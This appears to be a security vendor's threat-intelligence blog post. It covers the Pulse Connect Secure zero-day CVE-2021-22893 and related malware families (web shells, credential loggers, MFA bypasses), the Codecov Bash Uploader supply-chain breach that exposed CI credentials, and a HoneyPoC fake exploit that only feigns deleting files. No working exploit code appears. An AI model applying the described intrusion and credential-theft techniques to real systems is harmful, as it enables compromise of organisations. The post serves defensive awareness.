EDR / MDRIdentify, contain, respond, and stop malicious activity on endpoints
SIEMCentralize threat visibility and analysis, backed by cutting-edge threat intelligence
Risk Assessment & Dark Web MonitoringIdentify and quantify unknown cyber risks and vulnerabilities
Cloud App SecurityMonitor and manage security risk for SaaS apps
SOC ServicesProvide 24/7 threat monitoring and response backed by ConnectWise SOC experts
Policy ManagementCreate, deploy, and manage client security policies and profiles
Incident Response ServiceOn-tap cyber experts to address critical security incidents
Cybersecurity GlossaryGuide to the most common, important terms in the industry
Another day, another 0-day
On April 20, Pulse Secure released a new CVE for an unauthenticated remote code execution vulnerability for Pulse Connect Security – CVE-2021-22893 – with a CVSS score of 10.0. PCS is a VPN appliance by Pulse Secure which includes security features such as MFA; however, this CVE allows an attacker to bypass single and multi-factor authentication and gain a foothold inside your organization. To make matters worse, this vulnerability has already been used in the wild, making this another critical 0-day vulnerability.
Mandiant reports they are currently tracking 12 malware families related to Pulse Secure VPN exploits. Several vulnerabilities from 2019 and 2020 are being used as part of these campaigns as well as the recently disclosed CVE-2021-22893. These malware families are all bypassing authentication on these VPN devices but are not directly related to each other. The main group being tracked is UNC2630, believed to be a Chinese state-backed actor possibly related to APT5 and targeting US defense, finance, and government organizations. A second group, UNC2717, was observed targeting a European organization in March 2021.
Mandiant has identified a few novel malware families specifically targeting these vulnerable Pulse devices. SLIGHTPULSE is a web shell capable of arbitrary file reads, writes, and command execution. RADIALPULSE is a modified Perl script associated with a legit PulseSecure web application that logs credentials, including usernames and passwords, of legit users as they log in. One of the malware families being tracked is a new family referred to as SLOWPULSE which comes in multiple variants. Each variant is capable of bypassing different authentication procedures (some 2FA) or in some cases logs credentials. The full list of malware families related to known Pulse Secure breaches along with attribution is as follows:
- UNC2630 - SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK
- UNC2717 - HARDPULSE, QUIETPULSE, AND PULSEJUMP
We highly recommend updating your firmware if possible, though there are no patches yet for CVE-2021-22893. Pulse has released an Integrity Tool to help customers with mitigation. The Perch team already has some automated OSINT intelligence gathering that has been scraping the internet and collecting any and all available indicators related to the malware and will continue to research the vulnerabilities as more information becomes available.
Codecov supply chain attack
At the end of last year, we learned of a major attack targeting SolarWinds customers which has had everyone concerned with supply-chain attacks. This week, another major supply-chain attack was disclosed targeting users of Codecov’s code auditing tools, specifically their Bash Uploader script. According to Codecov’s website, “The Codecov Bash Uploader provides a language-agnostic alternative for sending your coverage reports to Codecov.” According to Codecov’s published security update, someone was able to gain unauthorized access to this script due to an error in Codecov’s Docker image that allowed the attacker to extract credentials that allowed them to modify the Bash Uploader script.
Codecov first noticed these changes on April 1 and then began a forensic investigation that revealed a breach going back to January 31. According to the post from Codecov, the modified Bash Uploader could have the following effects:
- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
- The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
Affected customers have been contacted with remediation recommendations. They recommend resetting all credentials, access tokens, and keys that the Bash Uploader could access. It would also be a good idea to update any locally stored versions of Bash Uploader to the latest at https://codecov.io/bash.
As the investigation continues, it is possible that the actors behind the original compromise have used the breach to pivot into customer networks, which include major tech companies such as IBM and HP. At this point, the full extent of this breach is not yet known, but this will most likely be an event very comparable to the SolarWinds hack in both the comparable skills required to carry it out as well as the scope of organizations affected.
Read the Source
And now for something completely different. While investing the Pulse Connect vulnerability above, I ran across some proof-of-concept (PoC) code on Github. I sent the link to one of the researchers on my team and asked him to check it out so we can build some detection signatures around it. A little while later, he messaged me and asked if I had read the code. Of course, I had not, that’s what I have a team for, but on his prompting, I took a look at the source code.
The relevant exploit script in this repo is named exploit.sh and it begins with basic checks to check which arguments are passed to the file along with some simple usage instructions:
Bash script to achieve RCE Flags: -c Target IP Address. usage: exploit.sh -c example: exploit.sh -c 10.0.0.1
If you run the script using the arguments listed above, you then see the following:
[!] Exploiting Host -c
This looks normal for PoCs. Then you see:
[+] Beginning Erasure of /
Then it seems to pause for a few seconds, while you process what you’re seeing, and then it looks like all the files on your local hard drive are deleted before your eyes. After a few minutes of shock, if you don’t do anything to intervene, it finally finishes listing all your local files and says:
[!] Deleted Root File System.
Another pause for a few seconds. Just enough time for you to consider your folly. Maybe you should have read the code before running it. And then, the finale:
We’re no strangers to love You know the rules and so do I. A full commitment’s what I’m thinking of. You wouldn’t get this from any other guy. I just wanna tell you how I’m feeling. Gotta make you understand Never gonna give you up. Never gonna let you down. Never gonna run around and desert you. Never gonna make you cry. Never gonna say goodbye. Never gonna tell a lie and hurt you. Warning: Binary output can mess up your terminal. Use “–output -” to tell Warning: curl to output it to your terminal anyway, or consider “–output Warning: ” to save to a file. [!] You should have read the source. HoneyPoC 3.0 - https://blog.zsec.uk/cve-2020-1350-honeypoc/
It appears this was all a ruse. Part of a research project named HoneyPoC that creates fake PoCs and embeds canaries used to track information on who is downloading PoCs. See the link at the end of the chorus for more information.
Of course, the research on my team and I both read the code before running it, but this is a good reminder to never blindly run someone else’s code no matter what it is or where you get it. You might get Rick Roll’d or very possibly much worse.
- Bryson Medlock, the Dungeon Master